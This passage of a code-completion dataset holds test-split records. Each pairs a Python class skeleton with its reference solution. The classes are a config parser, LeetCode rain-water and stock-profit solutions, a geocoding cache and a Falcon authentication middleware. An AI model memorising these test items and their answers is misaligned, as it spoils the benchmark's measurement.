"cec3f47692bc77fbdcb397ad7ec21c994328fc00", "skeleton": "<|skeleton|>\nclass Config:\n\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n <|body_0|>\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. @return: option value.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Config:\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. @return: option value.\"\"\"\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n", "source": "the_stack_v2_python_sparse", "source_path": "deeploader/dataset/config.py", "source_repo": "cnzeki/DeepLoader", "split": "test", "star_events_count": 1} {"blob_id": "841410261ea7c210a8f8ff63fa62aafa172f3b8d", "bodies": ["if not height:\n return 0\nmax_right = [height[-1]]\nrheight = reversed(height)\nnext(rheight)\nfor i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\nmax_right.reverse()\nmax_left = [height[0]]\nfor i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\ns = 0\nfor h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\nreturn s", "height = [0] + height + [0]\nn = len(height)\nleft_highest = [0]\nfor i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\nright_highest = [0]\nfor i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\nright_highest.reverse()\nret = 0\nfor h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\nreturn ret", "if not height:\n return 0\nret = 0\nhighest_idx = 0\nhighest = height[highest_idx]\nwater = 0\nfor i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\nhighest_idx_from_left = highest_idx\nhighest_idx = len(height) - 1\nhighest = height[highest_idx]\nwater = 0\nfor i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\nreturn ret", "max_from_left = [0]\nmax_from_right = [0]\nfor h in height:\n max_from_left.append(max(max_from_left[-1], h))\nfor h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\nmax_from_right.reverse()\nreturn sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))"], "bodies_text": "<|body_start_0|>\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n<|end_body_3|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n <|body_0|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_1|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n <|body_2|>\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000398", "length_bytes": 3861, "license_type": "no_license", "methods": [{"docstring": "08/06/2018 02:27", "name": "trap", "signature": "def trap(self, height)"}, {"docstring": "Time complexity: O(n) Space complexity: O(n)", "name": "trap", "signature": "def trap(self, height: List[int]) -> int"}, {"docstring": "Time complexity: O(n) Space complexity: O(1)", "name": "trap", "signature": "def trap(self, height: List[int]) -> int"}, {"docstring": "10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)", "name": "_trap", "signature": "def _trap(self, height: List[int]) -> int"}], "n_methods": 4, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def trap(self, height): 08/06/2018 02:27\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(n)\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(1)\n- def _trap(self, height: List[int]) -> int: 10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def trap(self, height): 08/06/2018 02:27\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(n)\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(1)\n- def _trap(self, height: List[int]) -> int: 10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\n\n<|skeleton|>\nclass Solution:\n\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n <|body_0|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_1|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n <|body_2|>\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n<|end_body_3|>\n", "revision_id": "1389a009a02e90e8700a7a00e0b7f797c129cdf4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n <|body_0|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_1|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n <|body_2|>\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode/solved/42_Trapping_Rain_Water/solution.py", "source_repo": "sungminoh/algorithms", "split": "test", "star_events_count": 0} {"blob_id": "1cf3a307aa971e6236aebd0d761ba139590fc651", "bodies": ["if city is None and state is None:\n return 'USA'\nelif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\nreturn f'{city}, {state} USA'", "loc_id = LocationCoordinates.to_location(city, state)\nrow = LocationCoordinates.query.get(loc_id)\nif row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\nreturn (row.latitude, row.longitude)"], "bodies_text": "<|body_start_0|>\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n<|end_body_0|>\n\n<|body_start_1|>\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n<|end_body_1|>\n", "class_docstring": "This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.", "class_name": "LocationCoordinates", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n <|body_0|>\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n<|end_body_0|>\n\n<|body_start_1|>\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000399", "length_bytes": 39169, "license_type": "no_license", "methods": [{"docstring": "Converts a city and state (both optional) to the key expected by this table.", "name": "to_location", "signature": "def to_location(city: str=None, state: str=None) -> str"}, {"docstring": "Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')", "name": "get", "signature": "def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001548", "prompt": "Implement the Python class `LocationCoordinates` described below.\n\nClass description:\nThis table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\n\nMethod signatures and docstrings:\n- def to_location(city: str=None, state: str=None) -> str: Converts a city and state (both optional) to the key expected by this table.\n- def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]: Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')", "prompted_full_text": "Implement the Python class `LocationCoordinates` described below.\n\nClass description:\nThis table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\n\nMethod signatures and docstrings:\n- def to_location(city: str=None, state: str=None) -> str: Converts a city and state (both optional) to the key expected by this table.\n- def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]: Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\n\n<|skeleton|>\nclass LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n <|body_0|>\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n<|end_body_0|>\n\n<|body_start_1|>\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n<|end_body_1|>\n", "revision_id": "344eec835b1468a828f83f6bc3f737c421777de5", "skeleton": "<|skeleton|>\nclass LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n <|body_0|>\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n", "source": "the_stack_v2_python_sparse", "source_path": "app/models.py", "source_repo": "shirtandtieler/Job-Website-Project", "split": "test", "star_events_count": 2} {"blob_id": "61c1bfbecef7de0eba4d102724e086051661809f", "bodies": ["if len(prices) == 0:\n return 0\ns0 = -prices[0]\ns1 = -2 ** 31\nfor i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\nreturn max(0, s1)", "maxNum = 0\nlength = len(prices)\nfor i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\nreturn maxNum"], "bodies_text": "<|body_start_0|>\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n<|end_body_0|>\n\n<|body_start_1|>\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n<|end_body_0|>\n\n<|body_start_1|>\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000400", "length_bytes": 1603, "license_type": "no_license", "methods": [{"docstring": ":type prices: List[int] :rtype: int", "name": "maxProfit", "signature": "def maxProfit(self, prices)"}, {"docstring": ":type prices: List[int] :rtype: int", "name": "maxProfit", "signature": "def maxProfit(self, prices)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005401", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n<|end_body_0|>\n\n<|body_start_1|>\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n<|end_body_1|>\n", "revision_id": "328408860fcf6bffbbd2096b4c7182d8abb2ea66", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n", "source": "the_stack_v2_python_sparse", "source_path": "lcode1-99/ex83/maxProfit.py", "source_repo": "rh01/gofiles", "split": "test", "star_events_count": 0} {"blob_id": "6469253f368155117f91d8c22133bac03f7296cf", "bodies": ["self.manager = SessionManager()\nself.config = dict()\nself.config['exempt_routes'] = exempt_routes\nself.config['exempt_methods'] = dict()\nself.config['exempt_methods']['global'] = exempt_methods\nroutes = self._get_all_routes(api)\nfor route in routes:\n self._get_settings(*route)", "routes = []\n\ndef get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\nfor node in api._router._roots:\n get_node_and_children(node)\nreturn routes", "local_conf = getattr(resource, 'auth', {})\nif local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\nself.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])", "if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')", "exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\ntry:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\nexcept BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\nself.csrf_protect(req)"], "bodies_text": "<|body_start_0|>\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n<|end_body_0|>\n\n<|body_start_1|>\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n get_node_and_children(node)\n return routes\n<|end_body_1|>\n\n<|body_start_2|>\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n<|end_body_2|>\n\n<|body_start_3|>\n if req.method == 